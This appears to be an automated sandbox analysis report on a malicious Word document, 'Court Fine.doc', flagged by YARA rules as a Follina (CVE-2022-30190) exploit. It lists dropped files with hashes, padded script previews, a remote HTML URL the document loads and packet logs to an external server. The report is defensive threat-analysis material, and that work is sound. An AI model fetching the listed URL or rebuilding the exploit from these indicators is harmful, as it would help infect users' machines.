      SHA-256:5C632292394979EBF07B47CC5F9DD62A04C53CFF3F6C85FA26D259612D010F75
      SHA-512:1A780ACF25E4B765BEB5FD34A587BBDD5991344BB0E075989192327C48EBD345BF9BD194CDF1BD0D5F13DCBB2E3BE035AB59283685D3FB3DC186B264EC6375BB
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm, Author: Joe Security
      Reputation:low
      Preview:.<!doctype html>.<html lang="en">.<body>.<script>.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJ

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):7275
      Entropy (8bit):5.573158632495138
      Encrypted:false
      SSDEEP:48:Ye+xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ6xuQ68:vUP+miLSAwD
      MD5:CDD33FFA502CBFFEC6E64C4574846A89
      SHA1:4E57B2D731513551B26F684B3D2871EB0F8CC14D
      SHA-256:5C632292394979EBF07B47CC5F9DD62A04C53CFF3F6C85FA26D259612D010F75
      SHA-512:1A780ACF25E4B765BEB5FD34A587BBDD5991344BB0E075989192327C48EBD345BF9BD194CDF1BD0D5F13DCBB2E3BE035AB59283685D3FB3DC186B264EC6375BB
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm, Author: Joe Security
      Reputation:low
      Preview:.<!doctype html>.<html lang="en">.<body>.<script>.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA.//zxcwalsdkhfn sadnh;KJ

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):5632
      Entropy (8bit):2.064572703959004
      Encrypted:false
      SSDEEP:48:rxJw7AMvn2wEy2w0i1AQ+Q/tMvn2w2y2w0iB:9Jw70wENwV1AQ+Q/Zw2NwV
      MD5:16A79AFC2AA06F10B7C3BA9AF3E7C036
      SHA1:5723D8FFDF337292E318AB62B28CD6ADAE62C182
      SHA-256:252730B8F5D9C0F018E8769237572D8F626517624B6335FC7D81FFF40D66734D
      SHA-512:3F81D5B48F9B071827678A5A2AC54281F12D13DC5F827A2D7132EB3ECC5B72D10415C32FA8691927A8002A6DD0566B715A36D2E8A28D18405FFF7373CFFAD352
      Malicious:false
      Reputation:low
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A788D5B-3466-495B-88B0-2FA2AEAC79CB}.tmp

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6E224AA4-9332-4211-9CA4-7A9B901A033B}.tmp

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):0.8065410214023134
      Encrypted:false
      SSDEEP:6:olgI5lNcY2Iel5E7l8iIjJ0dYB4PxZUtLamN:4v2iBUJEZw
      MD5:712D5A8CE10E91EFED4B1A1EB41849F5
      SHA1:7E2D68210C45F13D42BE4734453389AB8D0B70D4
      SHA-256:8C7D470BB5E3723F9CBAD381111A09AABBE71BE27906316A2E671409B90B3F8D
      SHA-512:FB36BEA5A5BF60846AF25CBE2F3EDF348EC2A64013A3230811566A76E8465616426109B9D6BF5AEEE9DE0F783C660551D03CE90752B97D481D4D91266F4A2E6A
      Malicious:false
      Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.a.k.m.a.l.r.e.l.o.a.d...c.o.m./.s.t.r.u.k./.w.e.l.l.c.o.m.e...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U

      C:\Users\user\AppData\Local\Temp\{0787006B-7849-4DC9-B7BB-8DBF12CB2E39}

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025496986098376227
      Encrypted:false
      SSDEEP:6:I3DPcLcr3vxggLR3fvstw66/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPjcUvYg3J/
      MD5:F2F5132E6962771250B2F3DA61355126
      SHA1:9A2BF12A3516E4CE453843DDD9B8B94376BCE14E
      SHA-256:664269EEE42CBA111E87391D8ACFE3607E9D2ACF0E1DE3437A6F1D0E9B5A8C7D
      SHA-512:3B66D9C888DF5EA79A9B841675876290DAC6D920B922794086B1342EDF5F437535E722DF74DD61356D3E4C4FA76FCF90FB6FC0A67DD01E9884492602302F9E56
      Malicious:false
      Preview:......M.eFy...z+.%`...M.=..}...S,...X.F...Fa.q............................K.(66i.N....j...........0.,...?I...e^.6......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\{2FC25150-2449-4370-9F51-ACDF6284F685}

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025579658191413727
      Encrypted:false
      SSDEEP:6:I3DPcU6p41hmHvxggLRpYtklNxXwltRXv//4tfnRujlw//+GtluJ/eRuj:I3DPlmPFtXQTvYg3J/
      MD5:2B131A2E85BCD794BAC91667A8DD3FE1
      SHA1:521D22ED142DB50773FECB705C3495294C8B62A4
      SHA-256:0A0269F9140F65CAC49FE0B559B653AEABD4BB93DC6BE75D951592772E055E56
      SHA-512:2237814DD0F5894D86BEC8C72ABF11A4756FBB8A99A0A8509CF70DD88FD32E4F19F5C724EB6E144FF31880B63C4E22C6AC13B27FB54782F9810ACCAB59953E16
      Malicious:false
      Preview:......M.eFy...z.._.J..E.....]S,...X.F...Fa.q............................~..E.b+@.\..7.em........../T...E.0..p@.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Court Fine.LNK

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:58 2022, mtime=Tue Mar 8 15:45:58 2022, atime=Thu Jul 21 20:26:18 2022, length=10734, window=hide
      Category:dropped
      Size (bytes):1014
      Entropy (8bit):4.550763041853616
      Encrypted:false
      SSDEEP:12:8jU16FgXg/XAlCPCHaXMBzB/nPyX+WgfcfCikliicvbSMhCDtZ3YilMMEpxRljKe:8QG/XT89dq+ulspeLCDv3qgG77
      MD5:5CDD5E2518A0562A8A2A5FD663C9C4A7
      SHA1:D66DC9944DA20CEB4328AE58B36799DDE2B179A8
      SHA-256:51587A61287BF12C2228D14C8C45066332C21BF951C050AD33DD20B916C781A3
      SHA-512:8FD589350D19C8A1EAD74963D7C5F7C0FD09A87CB9CC8129CD43A7538C13D37ED5A0E75FCBAE0C537E21C910FFA2A5F96903895BD4D148B430DDB95523252990
      Malicious:false
      Preview:L..................F.... ...d8...3..d8...3......H....)...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..)...TJ. .COURTF~1.DOC..J......hT..hT..*...r.....'...............C.o.u.r.t. .F.i.n.e...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\Court Fine.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.u.r.t. .F.i.n.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9...N..... .....[D_....3N...W...9...N..

      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):71
      Entropy (8bit):4.700901747101609
      Encrypted:false
      SSDEEP:3:bDuMJl+uuBCmX19RuBCv:bC0wlws
      MD5:120B034EB6B6B92AE484D8C680191DDE
      SHA1:4A290FB06BDA060533757A072DF583C48D32BD5F
      SHA-256:883F086DC75F1B2CE89171B98AEEAAF2B50DD6E6913F6B206166954E1B017841
      SHA-512:4AF0F233F568972D34B6D95F87E0DE6199DF3AA1900572E30ABD939C4059922C6133FB49A44CA207C8F48449E02EA50E16AFCA3E8E4C77FD2081C4FF32A20B09
      Malicious:false
      Preview:[folders]..Templates.LNK=0..Court Fine.LNK=0..[doc]..Court Fine.LNK=0..

      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.4797606462020303
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

      C:\Users\user\Desktop\~$urt Fine.doc

      Download File
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.4797606462020303
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

      Static File Info

      General

      File type:Zip archive data, at least v2.0 to extract
      Entropy (8bit):7.776614426711646
      TrID:
      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
      • ZIP compressed archive (8000/1) 7.92%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
      File name:Court Fine.doc
      File size:10734
      MD5:730768c4f029608adf0032e95e8e8a1d
      SHA1:c071befaa2d7548d53dfb0f1f611c6fd1b174f46
      SHA256:94fabeeeffae82a107913815c2b62e4311aeef432197e0d2d6af40a7a65cd5f1
      SHA512:6540610ac9db98f6a67b81029b4e0b3f7757e9b8399ab234f50225e8ff952f81f7c213e40a819a760d795d91e2e5b78bb83fb25a9a3ce978201522be1a9f1556
      SSDEEP:192:CEhMA1GheFb8c9264wpHV7Z/c+8poF1d3jvvtlFOrGxjPkfzUUy2G:Cq/1GAFbx92hwhcfa7pr1lFOyxjPkfz+
      TLSH:29228D36802A5D30DAAAF774F0A45A56EC5C1482E7773DF9B016BEB389C22CE5274E40
      File Content Preview:PK........$k.T................_rels/PK........$k.T................docProps/PK........$k.T................word/PK........$k.T...lT... .......[Content_Types].xml...j.0.E.....6.J.(.....e.h...4NDeIh&...8NC)i.M.1.3..3...x].l..m....}....X?+...9.....F.....@1.]_.

      File Icon

      Icon Hash:e4eea2aaa4b4b4a4

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 21, 2022 14:27:15.562505007 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:15.562547922 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:15.562647104 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:15.584110022 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:15.584130049 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:15.688189030 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:15.688410044 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:15.701831102 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:15.701862097 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:15.702217102 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:15.702328920 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.002845049 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.044497967 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.656471014 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.656761885 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.656786919 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.656860113 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.656909943 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.656977892 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.656985998 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.657001019 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.657025099 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.657052994 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.661003113 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.661039114 CEST44349171104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:16.661083937 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:16.661127090 CEST49171443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.584991932 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.585036039 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:23.585139990 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.585822105 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.585860014 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:23.666750908 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:23.666882992 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.674122095 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.674180031 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:23.674561024 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:23.695034981 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:23.736505032 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:24.360281944 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:24.360379934 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:24.360546112 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:24.383265018 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:24.383317947 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:24.383411884 CEST49172443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:24.383436918 CEST44349172104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:29.371695995 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:29.371771097 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:29.371871948 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:29.373940945 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:29.373980999 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:29.455991030 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:29.456223965 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:29.476640940 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:29.476663113 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:29.477127075 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:29.504311085 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:29.548502922 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.101973057 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.308506012 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.308650017 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.309060097 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.309248924 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.309279919 CEST44349173104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.309340000 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.309381008 CEST49173443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.310249090 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.310287952 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.310374975 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.311671019 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.311690092 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.403256893 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.403989077 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.404023886 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:30.405523062 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:30.405538082 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:31.136116028 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:31.136220932 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:31.136337996 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:31.137269020 CEST49174443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:31.137295961 CEST44349174104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.086927891 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:32.086987972 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.087083101 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:32.087445974 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:32.087483883 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.192456007 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.192651033 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:32.201138973 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:32.201173067 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.201617002 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.203011990 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:32.244527102 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:32.830347061 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.036537886 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.036787987 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.037116051 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.037445068 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.037491083 CEST44349175104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.037554026 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.037647009 CEST49175443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.037988901 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.038028955 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.038127899 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.038487911 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.038512945 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.126800060 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.127784014 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.127806902 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.129492998 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:33.129503965 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:33.865297079 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:34.069535017 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:34.069561005 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:34.069789886 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:34.069818974 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:34.070177078 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:34.070229053 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:34.070312977 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:34.070353031 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:34.070391893 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:34.070410013 CEST49176443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:34.070427895 CEST44349176104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.129178047 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:35.129221916 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.129307985 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:35.131640911 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:35.131683111 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.222321987 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.222486019 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:35.236445904 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:35.236473083 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.237169027 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.238620043 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:35.280510902 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:35.876391888 CEST44349177104.21.73.122192.168.2.22
